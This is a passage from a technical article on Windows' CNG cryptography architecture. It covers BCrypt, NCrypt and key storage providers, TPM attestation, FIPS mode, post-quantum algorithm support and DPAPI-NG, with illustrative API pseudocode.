AES was standardized in 2001, after CAPI's design was already frozen. Microsoft retrofitted AES into the original architecture by shipping the Microsoft Enhanced RSA and AES Cryptographic Provider [@learn-microsoft-com-cryptographic-provider] as a separate CSP, sitting alongside the original Microsoft Base Cryptographic Provider. Elliptic-curve cryptography was even more awkward: CAPI's algorithm identifiers and key-blob formats had no place for ECC curves. Every new algorithm required a new CSP or a new release of an existing one. The plug-in surface was rigid, the FIPS validation story was painful, and the API was relentlessly C-shaped in ways that made auditing hard.Microsoft was not alone. The same era produced Intel's Common Data Security Architecture (CDSA) [@en-wikipedia-org-os-2] and several short-lived crypto frameworks for OS/2 and other platforms. Most of them disappeared. CAPI's longevity owed more to Windows market share than to its design.

By 2005, Microsoft started over. The result was the Cryptography API: Next Generation, or CNG, which shipped with Windows Vista and Windows Server 2008 in January 2007 [@learn-microsoft-com-cng-portal]. CNG was not a refactor. It was a clean second system, designed from a different set of assumptions: algorithms would keep arriving, key storage needed to be a separate concern, FIPS validation had to be a first-class output, and the same API had to work in user mode and kernel mode.

The Windows cryptographic API introduced in Vista (2007) as the long-term replacement for CAPI. CNG splits cryptography into a primitives layer (`bcrypt.h`, `bcryptprimitives.dll`) and a key-storage layer (`ncrypt.h`, `ncrypt.dll`), each pluggable through registered providers. Used by every modern Windows component that touches cryptography. The plug-in unit of the legacy CAPI architecture (1998-onward). A CSP bundled algorithms, key storage, and FIPS posture into a single DLL. Largely superseded by CNG providers, but still present on the system for backwards compatibility.

The three design pillars Microsoft committed to in the CNG portal documentation were modularity, cryptographic agility, and FIPS-compliance readiness [@learn-microsoft-com-cng-features]. All three would matter twenty years later when post-quantum cryptography arrived without warning the protocol authors. We will get to that.

Throughout this article, "BCrypt" refers to Microsoft's CNG primitives header `bcrypt.h` and its companion DLL `bcryptprimitives.dll`. It is not the Provos-Mazieres password-hashing function of the same name, which is unrelated and uses a different spelling in most academic literature ("bcrypt"). The naming collision is unfortunate but firmly entrenched in Windows.

2. BCrypt: the symmetric stack and the ephemeral key

Open a Visual Studio project, include <bcrypt.h>, link bcrypt.lib, and you have access to almost every cryptographic primitive Windows ships. AES in CBC, CFB, ECB, GCM, and CCM modes. SHA-1, SHA-256, SHA-384, SHA-512, the SHA-3 family, and the cSHAKE128 and cSHAKE256 extendable-output functions added in Windows 11 24H2 [@learn-microsoft-com-algorithm-identifiers]. HMAC over any of those hashes. PBKDF2. The NIST SP 800-108 key-derivation construction. The DRBG-based random number generator drawn from NIST SP 800-90 [@csrc-nist-gov-1-final]. Ephemeral asymmetric operations -- RSA encrypt, ECDSA sign, ECDH key agreement -- on key handles that vanish when the process exits.

The canonical BCrypt opening dance is four calls.

{` // Pseudocode mirroring the BCryptOpenAlgorithmProvider flow. // In real C: NTSTATUS values, BCRYPT_ALG_HANDLE, etc.

const algId = "AES"; // wide string const impl = null; // null -> walk the priority list const flags = 0;

const hAlg = BCryptOpenAlgorithmProvider(algId, impl, flags); BCryptSetProperty(hAlg, "ChainingMode", "ChainingModeGCM");

const hKey = BCryptGenerateSymmetricKey(hAlg, keyBytes); const ciphertext = BCryptEncrypt(hKey, plaintext, authInfo);

BCryptDestroyKey(hKey); BCryptCloseAlgorithmProvider(hAlg, 0); `}

The interesting parameter is impl. When it is NULL, BCryptOpenAlgorithmProvider "attempts to open each registered provider, in order of priority, for the algorithm specified by the pszAlgId parameter and returns the handle of the first provider that is successfully opened" [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]. That sentence is the whole story of CNG provider priority in nineteen words.

Algorithm identifiers are wide strings. L"AES", L"SHA256", L"RSA", L"ML-KEM", L"ML-DSA", L"CHACHA20_POLY1305", L"CSHAKE128". Each string is registered in CNG's configuration store under HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\, with a per-algorithm ordered list of providers that claim to implement it. Add a new algorithm and you add a new string. Add a new provider and you append to its priority list. The API surface does not change.

Note: The algorithm-identifier string is the seam where cryptographic agility lives. As long as your protocol can encode "use whatever the spec calls AES-256-GCM," and as long as a CNG provider answers to that name, you can swap implementations without touching the calling code. Protocols whose wire format hard-codes the algorithm (the old SSL 3.0 cipher list, for example) do not get this benefit no matter what crypto API they call.

Underneath the API is a single implementation library. Microsoft's SymCrypt [@github-com-microsoft-symcrypt] has been the actual workhorse since Windows 10 version 1703: "SymCrypt is the core cryptographic function library currently used by Windows... Since the 1703 release of Windows 10, SymCrypt has been the primary crypto library for all algorithms in Windows." SymCrypt is open source. It carries hand-tuned assembly for AES-NI, VAES, SHA-NI, and PCLMULQDQ on x64, plus ARM64 SHA and AES intrinsics. On a modern Xeon, AES-GCM throughput from BCrypt routinely sits in the 4 to 8 GB/s range per core.

SymCrypt's open-source release in 2019 was a quiet event for a Microsoft library: the algorithms that protect Windows are reviewable by anyone willing to read C and ARM/x64 assembly.

BCrypt keys are ephemeral by construction. A BCRYPT_KEY_HANDLE lives in your process and dies with it. If you want to keep a private key around between processes, between reboots, or between machines, you do not use BCrypt. You use NCrypt.

That distinction is the first thing developers get wrong when they meet CNG. The second thing they get wrong is forgetting that BCrypt's GCM API does not allocate nonces for you. The NIST SP 800-38D specification of Galois/Counter Mode [@nvlpubs-nist-gov-nistspecialpublication800-38dpdf] is famously brittle under nonce reuse: a single repeated nonce under the same key destroys both confidentiality (XOR of plaintexts leaks) and authenticity (the GHASH authentication key becomes recoverable). With 96-bit random nonces the birthday bound limits safe usage to roughly $2^{32}$ invocations per key before collision probability becomes meaningful. Counter-based nonces sidestep the birthday bound entirely but require persistent state. CNG does neither for you. That part is your problem.

Note: First, GCM nonce reuse: BCryptEncrypt with BCRYPT_CHAIN_MODE_GCM accepts whatever 12 bytes you hand it. Counter or random, but never twice. Second, algorithm string drift: BCRYPT_SHA256_ALGORITHM is the macro for L"SHA256". L"SHA-256" returns STATUS_NOT_FOUND. Third, kernel-mode pseudo-handles: the convenient BCRYPT_AES_ALG_HANDLE shortcut is user-mode only per the BCryptOpenAlgorithmProvider remarks [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]; kernel drivers must use real handles.

Windows 10 added pseudo-handles -- pre-baked handle constants like BCRYPT_AES_ALG_HANDLE and BCRYPT_SHA256_ALG_HANDLE -- that skip the provider lookup for the built-in algorithms. The 24H2 release extended that list to include BCRYPT_MLKEM_ALG_HANDLE and the cSHAKE handles. Microsoft now recommends pseudo-handles over BCryptOpenAlgorithmProvider for new code [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider] when the algorithm is built in. The motivation is performance: pseudo-handles bypass the per-call provider walk and the configuration-store lookup.

That covers the primitives. Now we need a place to keep the keys.

3. NCrypt: where the long-lived secrets live

The ncrypt.h header opens a different door. Every function in the NCrypt API surface [@learn-microsoft-com-api-ncrypt] -- NCryptOpenStorageProvider, NCryptCreatePersistedKey, NCryptOpenKey, NCryptSignHash, NCryptDecrypt, NCryptKeyDerivation, NCryptExportKey, NCryptProtectSecret -- begins by routing the call through ncrypt.dll, which acts as a router rather than an implementation. The router decides which Key Storage Provider handles the operation and forwards the call.

That routing layer is the architectural distinction Microsoft has insisted on for two decades. Microsoft's Key Storage and Retrieval documentation [@learn-microsoft-com-and-retrieval] describes it like this: the NCrypt router "conceals details, such as key isolation, from both the application and the storage provider itself." Translation: the application calls NCryptSignHash and gets back a signature. It does not know -- and should not need to know -- whether the key lives in %APPDATA%, inside a TPM chip on the motherboard, on a smart card halfway across the room, or in a network-attached hardware security module in a data center on a different continent.

A registered plug-in DLL that owns persistent private-key material and exposes it through the NCrypt API. Microsoft ships four built-in KSPs (Software, Platform/TPM, Smart Card, and the CNG-DPAPI provider); third parties ship KSPs for HSM appliances, USB security keys, and cloud key services. Selecting a KSP is a matter of passing the right name string to `NCryptOpenStorageProvider`.

The mechanical flow for creating a persisted key looks like this.

sequenceDiagram participant App as Application participant Router as ncrypt.dll (NCrypt router) participant KSP as Microsoft Software KSP participant LSA as LSA key-isolation process participant Disk as %APPDATA%\Microsoft\Crypto\Keys\

App->>Router: NCryptOpenStorageProvider("Microsoft Software Key Storage Provider")
Router-->>App: hProvider
App->>Router: NCryptCreatePersistedKey(hProvider, "RSA", "MyKey", 2048, ...)
Router->>KSP: dispatch via registered KSP entry points
KSP->>LSA: LRPC: generate key, return handle
LSA->>Disk: write DPAPI-wrapped private blob
LSA-->>KSP: ok
KSP-->>Router: hKey
Router-->>App: hKey
App->>Router: NCryptSignHash(hKey, digest)
Router->>KSP: forward
KSP->>LSA: LRPC: sign with isolated key
LSA-->>KSP: signature
KSP-->>Router: signature
Router-->>App: signature

Two facts about that diagram matter. First, the private key bits never enter the calling process. They are generated inside the LSA process and the calling application only ever receives a handle and the eventual signature. Second, the LRPC hop is real: it costs roughly 30 to 100 microseconds per call on modern hardware. For bulk symmetric encryption you would not want this overhead, which is why CNG's design pushes you toward BCrypt for symmetric work and reserves NCrypt for the rarer, smaller, and more sensitive operations on long-lived asymmetric keys.The LSA key-isolation process is lsaiso.exe on systems with Credential Guard enabled, hosted inside the Virtualization-Based Security (VBS) trustlet boundary. On systems without VBS, the role is played by lsass.exe itself. Either way, key material does not enter the application's address space.

NCrypt is also where the asymmetric algorithms live in their persistent form. The Microsoft Software Key Storage Provider claims RSA keys from 512 to 16384 bits in 64-bit increments, DSA, DH, and ECDSA/ECDH on the NIST P-256, P-384, and P-521 curves [@learn-microsoft-com-and-retrieval]. Windows 11 24H2 added ML-KEM at the 512, 768, and 1024 parameter sets and ML-DSA at the 44, 65, and 87 parameter sets to the Software KSP's repertoire.

The split between BCrypt and NCrypt is sometimes confusing because there is overlap. You can sign with BCrypt's BCryptSignHash if you generated an ephemeral key pair. You can also sign with NCrypt's NCryptSignHash if the key is persisted in a KSP. The rule of thumb is: if the key needs to survive the process, use NCrypt; if it does not, use BCrypt. Real-world Windows code skews heavily toward NCrypt for asymmetric operations because almost every interesting asymmetric key has an associated certificate, and certificates outlive processes.

Note: The four Microsoft KSP name strings are MS_KEY_STORAGE_PROVIDER (Software), MS_PLATFORM_KEY_STORAGE_PROVIDER (TPM/Pluton), MS_SMART_CARD_KEY_STORAGE_PROVIDER, and MS_NGC_KEY_STORAGE_PROVIDER (Next Generation Credentials, used by Windows Hello). Typo any of these and you silently fall through to the Software KSP, which is a recurring source of "why is my key on disk instead of in the TPM" incident reports.

The router lets the application speak one language and have the storage backend vary. That makes the KSP plug-in model the most interesting piece of the architecture, and it deserves its own section.

4. The KSP model: one API, many places to keep keys

A KSP is a DLL on disk and an entry in the registry. The DLL exports a fixed set of function pointers that mirror NCrypt's API. The registry entry under HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Microsoft Software Key Storage Provider (and its siblings) tells ncrypt.dll which DLL to load when an application asks for a provider by name. That is the whole interface contract. If you can produce a DLL that implements the entry points and you can install a registry entry, you have a CNG KSP.

The platform comes with four. They sit on a spectrum from "your operating system is the entire trust boundary" to "the keys live on a separate piece of silicon and only signatures come back."

flowchart LR A["Microsoft Software KSP -- private keys on disk -- (DPAPI-wrapped)"] --> B["Microsoft Platform Crypto Provider -- TPM 2.0 or Pluton -- on-CPU silicon"] B --> C["Microsoft Smart Card KSP -- removable hardware token -- (PIV, CAC, Yubikey)"] C --> D["Third-party HSM KSP -- Thales Luna, Entrust nShield, -- YubiHSM 2, AWS CloudHSM"] A -.-> A1["~10^4 RSA-2048 sign/sec -- FIPS 140-2 L1"] B -.-> B1["~1-10 sign/sec -- TPM vendor cert"] C -.-> C1["~1-5 sign/sec -- card vendor cert"] D -.-> D1["~10^2-10^4 sign/sec -- FIPS 140-2/-3 L3 typical"]

4.1 The Microsoft Software KSP

The default. If you pass NULL for the provider name in NCryptOpenStorageProvider, you get this one. It stores per-user private keys at %APPDATA%\Microsoft\Crypto\Keys\ and per-machine keys at %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\SystemKeys\, with each file-level blob further protected by DPAPI under either the user master key or the LocalSystem (S-1-5-18) master key. The private-key operations dispatch through LRPC into the LSA key-isolation process so that even with administrator privileges on the machine, naive code-injection into the application's address space does not yield key bits.

The Microsoft Software KSP is also the only KSP that runs inside the LSA key-isolation process. Third-party KSPs run in the calling application's process. That difference matters enormously for the threat model. Microsoft notes this explicitly: third-party KSPs "do not run inside the LSA process" [@learn-microsoft-com-and-retrieval]. If you are a third-party KSP that talks to remote HSM hardware, the isolation comes from the HSM itself, not from any Windows process boundary.

4.2 The Microsoft Platform Crypto Provider (TPM and Pluton)

The KSP that answers to MS_PLATFORM_KEY_STORAGE_PROVIDER is the TPM's face to CNG. When you call NCryptCreatePersistedKey against it, the TPM 2.0 chip itself [@learn-microsoft-com-tpm-fundamentals] generates the key under the protection of its Storage Root Key. The private bits never leave the chip. The application gets back a handle whose only operations are sign, decrypt, and key derivation -- the private key cannot be exported, and that property is enforced by physics, not by software policy.

Key idea: The Platform Crypto Provider is the place where CNG stops trusting the operating system and starts trusting a separate piece of silicon. Every TPM-backed key in Windows -- BitLocker's Volume Master Key wrapping, Windows Hello credentials, AD CS attestation-enrolled machine identities -- enters and exits through this single KSP name.

Microsoft Pluton, the security processor that shipped in 2022 on AMD Ryzen 6000, Snapdragon 8cx Gen 3, and Intel Core Ultra Series 2 silicon, is exposed to Windows as a TPM 2.0 device behind the same Platform Crypto Provider name [@learn-microsoft-com-security-processor]. Application code that worked against a discrete TPM works against Pluton with no changes. Pluton's wins are at the supply-chain layer (no SPI bus to physically tap between the chip and the CPU) and the firmware-update layer (Pluton firmware ships via Windows Update). The Windows-facing API is intentionally identical.

4.3 The Microsoft Smart Card KSP

MS_SMART_CARD_KEY_STORAGE_PROVIDER is a single KSP that routes to whichever vendor minidriver claims the inserted card. The minidriver model is Microsoft's plug-in layer below the KSP layer: smart-card vendors do not write CNG KSPs, they write minidrivers, and Microsoft's single KSP fans the calls out to them via the APDU protocol. Cards that follow Microsoft's Generic Identity Device Specification (GIDS) [@learn-microsoft-com-device-specification] work without a vendor minidriver. Cards that do not, including most US federal PIV cards before about 2015, ship vendor-specific minidrivers.

This is the layer that powers Windows Hello for Business "virtual smart card" credentials, which present a TPM-backed key through the smart-card path because so much enterprise software already knew how to talk to PIV-style cards.

4.4 Third-party HSM and security-key KSPs

YubiHSM 2, Thales Luna, Entrust nShield, AWS CloudHSM Client for Windows, and various cloud-KMS bridges all ship CNG KSPs. The KSP DLL pretends to be a local provider and proxies operations across whatever transport the device uses -- USB for a YubiHSM, PCIe or TCP for a Luna, HTTPS for a cloud HSM. Latency varies from microseconds for a USB device to a few milliseconds for a network HSM. The application code that calls NCryptSignHash does not change.

For an internal Active Directory Certificate Services CA, the KSP choice is the entire trust story. A CA whose root key lives in the Software KSP can have that key extracted by any administrator. A CA whose root lives in a FIPS 140-2 Level 3 HSM KSP requires physical access to the HSM (often with multi-person key ceremonies) to recover the key. The application code in `certutil` is identical in both cases. The audit story is not.

5. The TPM KSP, attestation, and the hardware boundary

A TPM-bound key is a useful key, but a TPM-bound key with an attestation statement is a different kind of asset entirely. The Trusted Platform Module supports a primitive called key attestation: the TPM can sign a statement that says, "this key was generated inside me, I will never let it out, and here is a chain of trust back to my Endorsement Key that proves I am a real TPM made by a real vendor." A certificate authority that requires this attestation can refuse to issue a certificate for any key that did not come from inside a TPM.

Active Directory Certificate Services supports exactly this flow as "TPM key attestation" [@learn-microsoft-com-key-attestation]. The flow involves three keys: an Endorsement Key (EK) burned into the TPM at manufacture, an Attestation Identity Key (AIK) derived from the EK and certified by Microsoft or by the enterprise PKI, and the application key being attested. The AIK signs a statement covering the application key's properties; the CA verifies the AIK certificate chain and the statement, and only then issues a certificate.

flowchart TD EK["Endorsement Key (EK) -- burned into TPM at manufacture -- vendor cert from Intel/AMD/etc."] AIK["Attestation Identity Key (AIK) -- generated in TPM, certified by -- Microsoft EK CA or enterprise PKI"] APPK["Application key -- generated in TPM via -- NCryptCreatePersistedKey"] STMT["Attestation statement -- signed by AIK"] CA["Enterprise CA (AD CS) -- verifies AIK chain -- and attestation"] CERT["X.509 certificate -- issued to application key"]

EK --> AIK
AIK --> STMT
APPK --> STMT
STMT --> CA
CA --> CERT

The CNG-facing API for this is the property bag on a NCRYPT_KEY_HANDLE. After creating the key, the application calls NCryptGetProperty with NCRYPT_KEY_ATTESTATION_PROPERTY (and friends) to retrieve the attestation blob. The CA receives the blob in the certificate request and validates it against Microsoft's published EK CA roots. The whole protocol fits inside the standard certificate-enrollment flow.

Key idea: A software KSP can promise that a key is non-exportable. A TPM KSP can prove it.

Throughput is the price. A typical TPM 2.0 chip performs single-digit RSA-2048 signatures per second. Pluton-based platforms are in the same neighborhood. Any architecture that wants to do a TPM signature on every HTTP request will fall over almost immediately. The TPM is the right home for one signature per session, per boot, or per logon -- not one per packet.Key migration between TPMs is essentially impossible by design. Replace a motherboard, and any keys that were sealed to the old TPM's Storage Root Key are gone. This is the same property that makes BitLocker safe against motherboard theft (the recovery key, escrowed elsewhere, is the only way back) and the same property that makes TPM-bound device identities a key-management headache during hardware refresh cycles.

There is a deeper, more philosophical reason to use the TPM that the API does not advertise. Software keys are bounded by the kernel's process-isolation guarantees. Any kernel-level attacker, any user with SeDebugPrivilege, or any code injected into lsass.exe can in principle reach key material. The provably stronger bound -- keys that no OS-level code can ever read -- requires an off-CPU hardware boundary. CNG's own design notes acknowledge this when they say CNG "is designed to be usable as a component in a FIPS level 2 validated system" [@learn-microsoft-com-cng-features]: software-only isolation maps to FIPS 140-2 Levels 1 and 2; hardware boundaries are required for Level 3 and above.

6. FIPS 140 mode, compliance, and the one-bit toggle

There is a registry value at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled. When it is set to 1 (or when the equivalent Group Policy "System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing" is enabled), Schannel and CNG callers refuse to use algorithms that fall outside the FIPS-approved set. RC4 disappears. MD5 disappears. SHA-1 disappears for new signatures (though not for legacy verification). TLS suites that rely on any of those are removed from the negotiation list.

The toggle is a runtime gate, not a code path. The underlying modules -- bcryptprimitives.dll and cng.sys [@learn-microsoft-com-140-windows11] -- are the same modules either way. They have been submitted to the Cryptographic Module Validation Program [@csrc-nist-gov-modules-search] and validated against the FIPS 140-2 standard [@csrc-nist-gov-2-final]. The toggle simply tells those modules that the calling environment expects FIPS-mode behavior, and the modules then refuse the non-approved algorithms.

A US federal certification program (Federal Information Processing Standard 140) that subjects a cryptographic module to laboratory testing and NIST review. Validated modules receive a public CMVP certificate. Federal agencies, FedRAMP/CMMC contractors, and most regulated industries can only use validated modules in approved configurations. FIPS 140-2 and the newer FIPS 140-3 differ mainly in test methodology and the standard's own ISO/IEC alignment.

Two current Windows 11 certificate numbers are worth memorizing. CMVP certificate #4825 covers bcryptprimitives.dll [@csrc-nist-gov-certificate-4825]. CMVP certificate #4766 covers cng.sys [@csrc-nist-gov-certificate-4766], the kernel-mode primitives. Both are FIPS 140-2 Level 1 modules with a sunset date of September 21, 2026 under the CMVP's transition rules. Microsoft maintains the per-version FIPS validation portal for Windows 11 [@learn-microsoft-com-140-windows11], which lists the active certificates per build and the algorithms each one covers.

The cadence mismatch is the open story here. Windows ships H1 and H2 feature updates roughly every six months. CMVP validation of a new build's primitives DLL and kernel module typically takes 12 to 24 months. Federal customers, FedRAMP-bound cloud tenants, and CMMC contractors cannot run a Windows build that does not have an active FIPS certificate covering its cryptographic modules. Microsoft submits 140-3 evidence for newer modules, but as of mid-2026 no public 140-3 certificate is visible on CMVP for the bcryptprimitives.dll shipping in Windows 11 24H2.

Note: Setting FIPSAlgorithmPolicy\Enabled = 1 is necessary for FIPS compliance, but not sufficient. The validated configuration also requires that Windows be a covered build (with an active certificate), that you avoid third-party crypto libraries that have not been validated, and that algorithm choices stay inside the per-certificate Approved Mode list. A Windows version without an active certificate is not in compliance even with the toggle on.

The toggle also does not change the SymCrypt implementations. AES-GCM is still AES-GCM. What changes is which APIs the caller is allowed to reach. From the application's point of view, the symptom of FIPS mode is STATUS_NOT_SUPPORTED on BCryptOpenAlgorithmProvider(L"RC4", ...). From an auditor's point of view, the symptom is the absence of any disallowed primitive call in the binary.

7. The post-quantum slide: ML-KEM, ML-DSA, and the agility test

The piece of CNG that earns its "agility" billing is the post-quantum transition.

NIST opened the Post-Quantum Cryptography standardization process in 2016 and ran four rounds of public evaluation [@csrc-nist-gov-quantum-cryptography] before issuing the first final standards in August 2024. FIPS 203 standardizes ML-KEM (formerly CRYSTALS-Kyber), a module-lattice key encapsulation mechanism [@nvlpubs-nist-gov-fips-nistfips203pdf]. FIPS 204 standardizes ML-DSA (formerly CRYSTALS-Dilithium), a module-lattice digital signature algorithm [@csrc-nist-gov-204-final]. Microsoft Research had been working on lattice cryptography for years [@microsoft-com-quantum-cryptography], and the public CNG implementations followed quickly: Windows 11 24H2 ships ML-KEM and ML-DSA as first-class CNG algorithms.

Here is the surprising part: the CNG API surface did not change. Adding ML-KEM was a matter of registering new algorithm identifier strings -- BCRYPT_MLKEM_ALGORITHM, the parameter sets BCRYPT_MLKEM_PARAMETER_SET_512, BCRYPT_MLKEM_PARAMETER_SET_768, BCRYPT_MLKEM_PARAMETER_SET_1024 -- in the CNG algorithm-identifier registry [@learn-microsoft-com-algorithm-identifiers]. The opening dance for an ML-KEM key encapsulation looks exactly like the opening dance for an ECDH key agreement, except for the string.

{` // Mirrors the BCrypt pattern shown in the Microsoft sample // "Using ML-KEM with CNG for Key Exchange"

const hAlg = BCryptOpenAlgorithmProvider("ML-KEM", null, 0);

const hKeyPair = BCryptGenerateKeyPair(hAlg, 0, 0); BCryptSetProperty(hKeyPair, "ParameterSetName", "ML-KEM-768"); BCryptFinalizeKeyPair(hKeyPair, 0);

const pubBlob = BCryptExportKey(hKeyPair, "MLKEMPUBLICBLOB");

// Sender side: encapsulate to recipient's public key const recipPub = BCryptImportKeyPair(hAlg, "MLKEMPUBLICBLOB", pubBlob); const { ciphertext, sharedSecret: ssA } = BCryptEncapsulate(recipPub);

// Recipient side: decapsulate with the matching private key const ssB = BCryptDecapsulate(hKeyPair, ciphertext);

// ssA === ssB `}

That code is structurally identical to a 2007-era ECDH session. The string changes, the blob format changes, and the wire-format sizes change considerably. ML-KEM ciphertexts at the 512, 768, and 1024 parameter sets are 768, 1088, and 1568 bytes respectively, with public keys of 800, 1184, and 1568 bytes per FIPS 203 [@csrc-nist-gov-203-final]. ML-DSA signatures at parameter sets 44, 65, and 87 are 2420, 3309, and 4627 bytes per FIPS 204 [@csrc-nist-gov-204-final]. For comparison, an ECDSA P-256 signature is 64 bytes and an X25519 public key is 32 bytes. The PQC blowup is roughly an order of magnitude, and that has knock-on consequences for every protocol that carries certificates or handshakes on the wire.

The reason ML-KEM matters before any large quantum computer exists is the harvest-now, decrypt-later attack: an adversary recording today's TLS sessions can decrypt them years from now if the long-lived key-exchange material was only protected by RSA or ECDH. Long-lived secrets transmitted over the wire today -- medical records, source code, government cables -- have a confidentiality lifetime measured in decades. The motivation for hybrid PQ key exchange is that you cannot un-record traffic.

The wire-format problem is why most TLS-PQ deployments use hybrid groups: classical X25519 combined with ML-KEM-768, with the shared secret derived from both. If either component breaks, the other one still holds. The IETF draft draft-kwiatkowski-tls-ecdhe-mlkem [@learn-microsoft-com-mlkem-examples] defines the X25519MLKEM768 group with IANA codepoint 0x11EC, and Chrome, Cloudflare, and AWS shipped support in production in 2024. OpenJDK JEP 527 [@openjdk-org-jeps-527] tracks the equivalent work for Java's TLS stack. Schannel in Windows 11 24H2 can negotiate ML-KEM through CNG, but Microsoft has not publicly committed to a default-on hybrid group at the Schannel layer as of mid-2026.

On a Windows 11 24H2 machine, the following PowerShell snippet asks CNG for its registered algorithms:

[System.Security.Cryptography.CngAlgorithm]::new("ML-KEM")
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\Default\0010'

The first line forces a CngAlgorithm lookup. The second walks the configuration store. If the keys ML-KEM and ML-DSA appear, your kernel-mode and user-mode primitives are 24H2-current.

The bigger structural lesson is that two decades of "cryptographic agility" claims actually paid off. The PQC transition required a 24H2 update, not a CNG redesign.

8. Where CNG actually shows up: TLS, BitLocker, and friends

The argument for an OS-level cryptographic API stands or falls on what runs on top of it. Every modern Windows component that touches cryptography is a CNG consumer.

The Windows implementation of TLS and DTLS, exposed through the SSPI (Security Support Provider Interface). Schannel handles the TLS protocol state machine, certificate validation, and cipher-suite negotiation, then delegates the actual cryptography to BCrypt and NCrypt. The cipher-suite priority list and protocol-version controls are configured per Windows version, often via Group Policy.

Schannel, the Windows TLS stack, sits directly above CNG. The Schannel cipher-suite list is its own per-version object, documented at the Schannel cipher-suites portal [@learn-microsoft-com-in-schannel]. For TLS 1.2 and earlier, the order is administered via the registry key HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\SSL\00010002 (the "Functions" value) or the Group Policy "SSL Cipher Suite Order." For TLS 1.3, the three suites (TLS_AES_256_GCM_SHA384, TLS_AES_128_GCM_SHA256, TLS_CHACHA20_POLY1305_SHA256) are not user-orderable; Schannel hard-codes the priority. TLS 1.0 and TLS 1.1 are off by default in Windows 11 23H2 and later, per Microsoft's August 2023 deprecation announcement [@techcommunity-microsoft-com-windows-3887947].

flowchart TD App["Application -- (WinHTTP, HttpClient, browser, ...)"] SSPI["SSPI / CredSSP layer"] Schannel["Schannel -- protocol state machine -- cipher-suite negotiation"] BCrypt["BCrypt -- AES-GCM, SHA-2/3, HKDF, RNG"] NCrypt["NCrypt -- server cert private key sign -- client cert auth"] KSP["KSP (Software / TPM / -- Smart Card / HSM)"]

App --> SSPI
SSPI --> Schannel
Schannel --> BCrypt
Schannel --> NCrypt
NCrypt --> KSP

BitLocker is the canonical NCrypt-and-TPM consumer. The Full Volume Encryption Key (FVEK) is generated and stored encrypted on disk. The Volume Master Key (VMK) wraps the FVEK and is itself wrapped by one or more "protectors": the TPM, a recovery password, a startup PIN, a USB startup key. The TPM protector is an NCrypt-style operation against the Platform Crypto Provider, sealed to a set of Platform Configuration Register (PCR) measurements that capture the boot state. If anything in the early boot chain changes, the PCRs do not match, the TPM refuses to unwrap the VMK, and BitLocker falls back to recovery.

Authenticode, the signature format on Windows binaries, is a NCrypt-driven workflow at signing time and a BCrypt-driven workflow at verification time. The Windows kernel verifies driver signatures, the Windows loader verifies binary signatures, and WinVerifyTrust exposes the same machinery to applications. The hash algorithm in modern Authenticode is SHA-256, which means every signed executable on the system has a SHA-256 digest computed by BCrypt at some point during validation.

Credential Guard runs the LSA isolated process (lsaiso.exe) inside the Virtualization-Based Security trustlet boundary on systems with VBS enabled. Credential Guard does not replace CNG; it relocates the Microsoft Software KSP into a stronger isolation boundary. NTLM password hashes and Kerberos TGT session keys live inside that boundary, accessible only through the standard CNG calls dispatched into the trustlet.

Windows Hello for Business uses the Platform Crypto Provider as the home for the user's gesture-protected authentication key. The biometric (or PIN) unlocks a key in the TPM; that key signs an attestation that is consumed by Azure AD or AD FS. The biometric never leaves the device.

DPAPI and DPAPI-NG are themselves built on CNG, and they deserve their own section because they are the easiest place to see how the layering pays off.

Schannel, BitLocker, EFS, Authenticode, Credential Guard, Windows Hello, DPAPI-NG, IPsec, SMB encryption, Kerberos PKINIT -- every modern Windows component is a CNG consumer.

9. DPAPI-NG: a worked example of the NCrypt model

The original Data Protection API (DPAPI), shipped with Windows 2000, was a per-user secret-protection mechanism. An application called CryptProtectData, passed a blob of secret data, and got back an encrypted blob that only the same user on the same machine could later unwrap. The mechanism was anchored in the user's logon credentials, with a master key per user and a complex backup mechanism for password resets. It worked. It also locked the secret to a single machine, which became a problem the moment users started living on more than one device.

DPAPI-NG, introduced in Windows 8 and Windows Server 2012, is the cloud-era rebuild. The CNG DPAPI documentation [@learn-microsoft-com-cng-dpapi] describes the three calls: NCryptCreateProtectionDescriptor, NCryptProtectSecret, and NCryptUnprotectSecret. The protection descriptor is a small string that names who can unwrap the data. Examples include SID=S-1-5-21-... for an Active Directory user or group, LOCAL=user for the legacy single-user behavior, WEBCREDENTIALS=... for a credential vault entry, and combinations connected by AND or OR operators.

flowchart LR Plain["plaintext secret"] --> Protect["NCryptProtectSecret(descriptor, plain)"] Desc["descriptor: -- SID=group GUID -- OR -- LOCAL=user"] --> Protect Protect --> Blob["opaque blob"] Blob --> Unprotect["NCryptUnprotectSecret(blob)"] Unprotect -.->|"resolves descriptor -- via AD DC backup keys"| AD["Active Directory DC -- (DPAPI backup keys)"] Unprotect --> Out["plaintext secret -- on any authorized machine"]

The architectural win is that DPAPI-NG is just NCrypt with a particular protection-descriptor schema. Any KSP that can serve the key referenced by the descriptor can satisfy the unwrap. In an Active-Directory-joined environment, the AD domain controller's DPAPI backup keys allow any machine where the user (or any member of the named group) authenticates to recover the secret. The application that called NCryptProtectSecret does not need to know about backup keys, replication topology, or recovery flows. It calls NCrypt; the router and the relevant KSP do the rest.

This is the design payoff of the two-tier model. A new key-management capability (cross-machine recovery via AD-stored backup keys) becomes a new descriptor type, not a new API. The Windows team has used the same descriptor extensibility to add web-credential descriptors, container-bound descriptors, and the descriptors that protect Group Managed Service Account passwords. Each one is a private key-management concern; none of them broke the public API.The DPAPI-NG descriptor language is small enough to read in one sitting and powerful enough to express "any member of this AD group, on any machine where that member can authenticate." That is the cloud-era access-control story that the original DPAPI never had.

10. Engineering takeaways: choosing the right tool

The decision tree for CNG usage in production code is short.

